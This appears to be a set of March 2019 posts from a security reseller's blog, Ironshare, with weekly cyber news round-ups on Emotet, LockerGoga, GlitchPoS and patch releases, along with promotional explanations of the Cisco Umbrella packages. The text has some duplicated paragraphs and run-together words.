Emotet started out its life as a banking trojan, that infectedtarget machines with a goal of silently stealing sensitive personal and financialinformation from its victims.
Almost five years on from this initial find, Emotet hasbecome one of the most active, costly and destructive malware families in the worldtoday.
Emotet is known as a ‘Trojan Virus’, and like the Trojan Horsein Greek history, it appears to be one thing on the surface while inside it’s somethingvery different. The trojans job is to first infect a target system by evading itssecurity defences, before unleashing the more malicious hidden payload it iscarrying inside.
One of the attractions for cyber criminals is itspolymorphic behaviour, that gives Emotet the ability to change itself every timea version of the malware is downloaded. This is one of its methods that is usedto evade detection by signature based Anti-Virus and Intrusion Preventionproducts.
Today, Emotet has evolved into far more than just a standardbanking trojan.
Recorded Future has this week released its annual report on the Top 10 vulnerabilities of 2018.
The report highlights that for the second year in a row, Microsofthave come out on top, as the most exploited software, with Office and Internet Exploder,(oops, Explorer), appearing in 8 of the top 10 vulnerabilities listed.
Recorded Future’s analysis focused on exploit kits, phishingattacks, or remote access trojans that coincide with a vulnerability, and occurredbetween 1 January 2018 and 31 December 2018. Their analysis was based onthousands of sources, including code repositories, deep web forum postings, anddark web sites.
The remaining 2 spots were taken by Adobe Flash Player, inthe form of exploit kits and ransomware, and Google’s Android OS, targeted by theremote access trojan AndroRAT.
One vulnerability CVE-2016-0189, has made the list for threeyears in a row. This vuln exists in Internet Explorer versions 9 to 11 and hasbeen targeted by numerous exploit kits during that time. The reason for itspersistent presence is due to a lack of full mitigation, and although therehave been security updates from Microsoft related to this CVE, the only workaroundappears to be controlling access to the Jscript and Vbscript DLL files.
What this report really highlights is that there are still toomany devices out there that are not being kept up to date with the latestsecurity patches. It’s not just operating systems (like MS Windows) thatrequire regular security updates; applications, network devices and IOT devicesshould also form part of any regular patching activities.
If you’re a home user the best option is to ensure that alldevices, PC’s, mobiles and tablets etc. are all set to update themselves automatically,as new versions become available.
A full copy of the report can be viewed here: https://go.recordedfuture.com/hubfs/reports/cta-2019-0319.pdf
The Cisco Talos Intelligence team have released anotherexcellent blog post which details the investigation into a destructive Ransomwarevariant known as LockerGoga.
Like other Ransomware variants LockerGoga, encrypts the contentsof the victim’s machine, preventing access to the data and holding it toransom. The attackers typically request payment via a crypto currency such asBitcoin from the victim, before they release the decryption keys providingaccess to the data once more.
Certain versions of LockerGoga have been seen to logout users, preventing them from logging back in, leaving them with no means to access the system or decrypt the files, indicating a more destructive nature.
Initial infection is not currently known, but unlike otherversions of ransomware the ransom note that is left on the machine does not includepayment instructions, but instead just leaves details for contact theattackers.
This threat is still being monitored and analysed by Talos,so we can expect more information to follow as it becomes available.
As usual with these types of posts from Talos this is an in-depthtechnical write up so is not for everyone, but if you’re into your malware analysisdetails, then head on over to the Talos blog to read more.
And that’s it for this week, please don’t forget to tune in forour next instalment.
Why not follow us on social media using the links providedon the right.
Edition #34 – 22nd March 2019
By
Stuart Hare
on
21/3/19
Back in 2014, security researchers came across a new threatin the wild they dubbed Emotet.
Emotet started out its life as a banking trojan, that infectedtarget machines with a goal of silently stealing sensitive personal and financialinformation from its victims.
Almost five years on from this initial find, Emotet hasbecome one of the most active, costly and destructive malware families in the worldtoday.
Emotet is known as a ‘Trojan Virus’, and like the Trojan Horsein Greek history, it appears to be one thing on the surface while inside it’s somethingvery different. The trojans job is to first infect a target system by evading itssecurity defences, before unleashing the more malicious hidden payload it iscarrying inside.
One of the attractions for cyber criminals is itspolymorphic behaviour, that gives Emotet the ability to change itself every timea version of the malware is downloaded. This is one of its methods that is usedto evade detection by signature based Anti-Virus and Intrusion Preventionproducts.
Today, Emotet has evolved into far more than just a standardbanking trojan.
Due to its versatility it has become a favourite for cybercriminals in their efforts to improve the chance of successful infection of atarget. As described above, it no longer just seeks to deliver banking malware,its continued evolution sees the addition of newly developed modules thatallows it to remain an effective delivery platform for different types of malware.
Emotet primarily uses malspam campaigns to spread via email,typically containing a malicious email attachment, in the form a macro enabled MicrosoftOffice document. Following initial infection Emotet has the capability to stealpersonal information and online credentials, before launching its hiddenpayload.
Malicious payloads such as ransomware, Quakbot, TrickBot, Ursnif, Zeus Panda & IcedID are just a few that have been delivered using the Emotet family.
Once a target system has been infected, it uses moduleswithin the malware to spread throughout the network, via brute forcingtechniques and SMB exploits (such as DoublePulsar & EternalBlue), toconnect to and infect more servers and devices.
In addition to security evasion techniques, it can alsodetect when it is inside a malware analysis sandbox. And through its establishedCommand & Control infrastructure (C2), Emotet can receive instructions andsoftware updates, that can extend the capabilities of the malware or add furthermalicious payloads.
The below image shows how Emotet works (courtesy of US CERT website):
All this just helps the attackers stay ahead of the game andincreases the spread of the malware.
Although Emotet is a family of advanced malware, it’s not alldoom and gloom. There are things you can be doing to protect yourselves fromthe threat of infection.
Cisco Umbrella is the first line of defence against internet threats and is an effective first step in stopping an Emotet infection in its tracks.
With up to 500 newly generated malicious documents beinghosted on compromised websites every day, you need a solution that can dynamicallyprotect you.
Researchers at Cisco have developed a classifier to automaticallydetect and block these Malspam campaigns. By integrating this classifier intothe Cisco Security products such as Cisco Umbrella, we can actively protectagainst this threat.
As soon as Emotet is detected, Cisco Umbrella can blocktraffic at the IP or domain level, or alternatively send it to the IntelligentProxy for further inspection. You no longer need to wait for a connection to bemade or malware to be downloaded to detect the threat.
By using Cisco Umbrella, you can prevent your users, devicesand networks from ever establishing a connection to these bad domains or IPaddresses.
At Ironshare we are actively using Cisco Umbrella to protectour customers from the threat of Emotet.
The images above show just a couple of examples of the compromised domains from Umbrella Investigate that have been blocked this year, preventing our customers from infection and almost certain compromise.
If you would like to find out more about how Cisco Umbrellacould protect your business or if you would like a free trial, please use thelink below to contact us.
By
Stuart Hare
on
20/3/19
Let's talk Cisco Umbrella and the various packages on offer…"Umbrella package" is a very broad term but essentially Cisco offer five variants of the same product, each with it’s own particular set of benefits, and each suited to specific business needs.On top of the Cisco product, Ironshare offer a number of additional services.Let's take a look at each option, its pros and cons, and how much it costs, and then see if we can narrow it down a bit so that you make the right choice for your company.
This is the basic network security package that only protects employees classed as roaming users who are not regularly connected to your network (i.e. it won’t provide any protection for internal non-roaming staff connected to the office network). It provides reporting on which websites are being accessed but does not enable you to block access to specific sites. The protection for this package is provided through the Cisco Anyconnect Roaming Security or Umbrella Roaming Clients.You might want to purchase this if you want to know what sites your roaming employees are accessing, and also if you feel those same users lack security protection when away from the office.This package does require existing Cisco Firewalls (ASA or NGFW) with Cisco AnyConnect Client software or alternatively the Umbrella Roaming Client software.It would be particularly useful for those employees that are often on the road like sales people, and would support and protect them when they connect remotely, even if they do not use your company VPN (Virtual Private Network).
This package is targeted at companies that are medium sized or above, where branch or remote offices become more relevant. Security enforcement in these areas is difficult and there is often a lack of visibility of what the users are accessing, and whether local security controls are truly in operation.Cisco Umbrella can be deployed very quickly and protect these branch offices (and their guests) from Malware, BotNet and Phishing attacks. Protection is only offered whilst users are on the branch or remote office network (i.e. it doesn’t work if they go out on the road, or work from home). Content filtering can be applied if required – for example you might want to prevent users from accessing social media, gambling or other such sites when they are in work.The Branch package is used by integrating Umbrella with your existing Cisco ISR 4000 devices, this is achieved by simply upgrading the software and establishing a secure connection to Cisco Umbrella.It’s a good layer of basic threat protection that is pretty much ‘set and forget’ for the IT professionals that support it.
Provides protection specifically for devices that connect to the internet using your Wi-Fi network. Umbrella WLAN integrates with a broad range of Wireless LAN Controllers and Access Points, including Cisco, Cradlepoint, Aruba, Aerohive and other WLAN products.The Umbrella WLAN package brings the benefits of visibility and policy control, for each public IP address and WLAN appliance configured.
Offers basic functionality both on-and-off your network and is ideally suited to retail and hospitality, healthcare, higher education and other industries that have a very widespread and decentralised operation.It can be deployed to companies of any size, and can replace existing web filters and also secure your users wherever they go. It’s a nice level of consistent security for companies and organisations that have many different networked sites and also where Guest Wi-Fi is prevalent.
Contains all of the benefits from the other packages we’ve discussed, and more. It’s ideal for companies that not only want to prevent security breaches, they also want to take action and proactively seek out recognised threats within the company.For instance, an employee’s PC might have become infected with a virus from a memory stick or an email attachment, and it could be attempting to send company information out to a malicious website. Umbrella would not only prevent that external contact being made, but it would also be able to help pinpoint the PC that needs further investigation e.g. a virus may need to be removed.Companies interested in this proactive ‘clean up’ approach may recognise they have weaknesses within their current business security arrangement, or they might have other complications such as a decentralised network or a Bring Your Own Device (BYOD) policy.Insights provides a layer of consistent security around the network perimeter. For companies that know they are susceptible to cyber-attacks, it enforces that first layer of security, provides further assurance and helps to prevent security breaches in the future.
This is for larger businesses that have a dedicated security team in-place, who are ready to take action in the event of a security breach. Global enterprises may well adopt the platform package, particularly if they have been impacted in the past, and have perhaps become aware that that they need more visibility around their estates security.Once again Umbrella provides a layer of consistent security around the network perimeter, and can block threats that other products cannot see, often minimising remediation effort.The platform package includes a few extra services over and above Insights – it can integrate with other partner products through an Application Programming Interface (API) but most interestingly it includes access to the ‘Investigate’ console, which is where security teams can delve into the background of threats that are emerging in the wider world, or that have surfaced within their own company.The threat intelligence provided through Investigate, can quickly add a lot of background information to any security related findings and can help Security Incident Response Teams (SIRTs) to identify best steps for remediation.
You may be reading about Cisco Umbrella for the first time, and there’s lots to consider, so don’t worry if you’re still a bit confused about which product is best for your business.The Ironshare way is to simplify security. We try and avoid jargon as much as possible, so let’s cut to the chase and underline what options we recommend to prospective customers – hopefully it helps!
In terms of the packages covered above Ironshare will be providing the following as our core offerings:
Option 1 – Ironshare supply you with the licenced productMaybe you’re quite familiar with the product range. As Cisco partners we can provide any of the Umbrella packages as a licensed product - you can install within your environment, you can learn how to use Umbrella, and you can manage the day-to-day analysis and periodic reporting.Option 2 – The Ironshare Managed Service for SMEs (Small and Medium sized businesses)Whilst there is value throughout the entire Umbrella product range, at Ironshare our managed service is focused on the Cisco Umbrella Insights package. This ensures that your users are protected both on and off-network, and you can also control which websites they access both on-site within the office and externally when they are using your equipment in hotels, and at home.The additional benefit of this being an externally managed service is that we do the lot… from the rapid installation (with a little help from your techies), to the ongoing daily management and the regular reporting that helps you understand what websites users are accessing, and where threats exist (for example, we can identify PCs that have may have become infected and are therefore automatically and consistently trying to access malicious websites throughout the day.)If your IT or security personnel want visible access to anything behind the scenes within Umbrella, we can provide them a console access for this purpose, but generally, we take care of everything and report back our findings on a regular basis.Option 3 – The Ironshare Enterprise Level Managed Service (Large businesses with 5000+ users)For larger companies that have their own dedicated security team we usually recommend the ‘Platform’ package. It comes with a fully customisable and powerful backend interface, which your team can use to delve into any threats that Umbrella identifies, and it can also be a useful tool for internal security investigations.We still offer a fully managed service, so can take the strain away from your team – feeding in detailed information to make their life easier. It’s more of a collaborative service, but let’s your staff focus on their normal daily jobs without having to adopt and learn new products.ConclusionCisco Umbrella is a very simple and yet very powerful Cloud based platform that can be remotely deployed (within a day in some instances - depending on the complexity of your network). Once it’s in operation, it provides immediate predictive security, both on-and-off your network, as well as content filtering and white and black list features to give better control over user activity, and much more.Ironshare provide a fully managed service, meaning that all you need to do is tell us what you want to know about, and when. We’ll then tailor the service to your needs and deliver management reporting and recommendations as often as requested.Our service is applicable to companies of all shapes and size, meaning that even the smallest businesses can get a full enterprise service, and use our reports to easily identify problem PCs, or employee activity concerns.If you'd like to get detailed pricing for any of these options, please click here to Contact Us.
By
Stuart Hare
on
15/3/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
The second Tuesday of the month is here which means its timefor more monthly security updates from Microsoft. A total of 64 vulnerabilitieshave been addressed this month, which include 17 updates rated Critical, 45Important, with 1 Medium and 1 rated Low.
These updates cover releases for Windows Operating Systems, Edgeand Internet Explorer Browsers, Office, SharePoint, DHCP, Team Foundationserver, Skype for Business and of course the ChakraCore scripting engine.
Microsoft’s Edge browser has updates that resolve 7 CriticalCVE’s that are related to memory corruption vulns in the scripting engine,these have a regular appearance in patch Tuesday, and are caused by the wayobjects are handled in memory.
I was pleased to see Rockstar Games actively trying to getits users to adopt two factor authentication on their accounts this week.
In the ‘Flight Week in GTA Online’ announcement which wasposted to their website, Rockstar have generously offered a nice in-game bonusto any users that enable 2-step verification.
2-step verification is another name for 2FA and basicallymeans you will need a code in addition to your username and password in orderto access your account, providing an additional layer of security that protectsaccounts from unauthorised access.
Rockstar have stated that any user that adds 2FA to theirsocial club account will be rewarded with:
To enable 2-Step Verification on your Social Club account, go to the following link: https://socialclub.rockstargames.com/settings/mfa
This is a great step by Rockstar Games to incentivise itsusers to increase their account security. Let’s hope that other companies followin their footsteps.
Action Fraud UK have reported that fraudsters are notletting up and they are still seeing a huge number of TV licensing phishingscams that we first witnessed in September 2018.
The phishing campaign is continuing to target the generalpublic, sending fake TV licensing emails that are convincing victims to partwith their personal and financial information.
Action Fraud have received over 900 fraud cases, totalling morethan £830,000 in financial losses for the victims, since April 2018.
To protect yourself against these types of phishing attacks:
If you have been a victim of fraud then you can report your case using the Action Fraud UK website.
A new post from the Cisco Talos team this week, hasidentified and detailed a new Point of Sale malware called GlitchPoS, thatinfects sales websites and electronic retail sales machines (tills) with thegoal of capturing credit card information.
Attackers can use this malware to increase their finances, andfund further criminal activities.
This new PoS malware has been found available for purchase oncrimeware forums and Talos believe that this is not the first malware that hasbeen developed by this actor.
GlitchPoS is controlled by its own C2 infrastructure thatincludes a GUI based Dashboard control panel. The dashboard reports the numberof Bots available and online, as well as the amount of infected PoS devices.
Captured card data from the infected machines is sent to theC2 servers and is displayed in the dashboard console so they can be easilyaccessed by the attackers.
Although it is unclear at this stage how many purchases ofGlitchPoS have been made, it is clear that Point of Sale malware remains alucrative option for cyber criminals, and development of this type of malwarecontinues.
Cisco AMP and Umbrella can be used as effective controls thatprevent this threat.
Cisco AMP for Endpoints can be used to detect and block thistype of malware from executing on your devices.
While Cisco Umbrella can be used to prevent infected devicesfrom communicating with the Command & Control (C2) servers.
It is also strongly advised that Point of Sales terminals areupdated along with other IT infrastructure and should be placed in their ownnetwork segment to ensure that they are isolated from your critical systems.
Nineteen vulnerabilities have been patched by Intel for its Windows 10 graphics drivers, that including two flaws rated with a high severity.
These two vulnerabilities are covered by CVE-2018-12214 andCVE-2018-12216.
The first is a memory corruption issue that exists in the kernelmode driver and allows an attacker with local access privileges to execute codeon the target system.
The second has a CVSS rating of 8.2, also existing in theKernel mode driver, but this time it’s due to a lack of input validation thatcan allow an attacker to execute code with local privileges.
The remaining updates have a mix of of low & medium severities,and may result in Information Disclosure, Denial of Service or Privilege Escalation.
Intel recommends that users of Intel Graphics Driver forWindows update to versions 10.18.x.5059 (aka 15.33.x.5059), 10.18.x.5057 (aka15.36.x.5057), 20.19.x.5063 (aka 15.40.x.5063) 21.20.x.5064 (aka 15.45.x.5064)and 24.20.100.6373 or later.
Updates can be found available in the Intel download center: https://downloadcenter.intel.com/product/80939/Graphics-Drivers
And that’s it for this week, please don’t forget to tune in forour next instalment.
Why not follow us on social media using the links provided on the right.
Edition #33 – 15th March 2019
By
Stuart Hare
on
15/3/19
No results found.
